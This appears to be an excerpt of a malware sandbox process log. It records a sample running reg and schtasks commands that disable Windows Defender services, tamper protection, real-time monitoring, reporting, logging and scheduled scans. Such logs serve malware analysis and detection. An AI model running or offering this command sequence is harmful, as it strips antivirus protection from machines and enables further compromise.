reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4392

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4656

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
4⤵
PID:4468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
4⤵
PID:3256

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
4⤵
PID:3696

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
4⤵
PID:3596

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
4⤵
PID:3692

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f
4⤵
PID:3452

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:2464

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
4⤵
PID:2468

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
4⤵
PID:2596

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
4⤵
PID:68

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
4⤵
PID:3032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
4⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
4⤵
PID:4120

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
4⤵
PID:2356

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
4⤵
PID:3940

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:1340

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
4⤵
PID:2064

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
4⤵
PID:4012

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
4⤵
PID:428

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
4⤵
PID:3980

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
4⤵
PID:2144

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
4⤵
PID:712

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
4⤵
PID:3012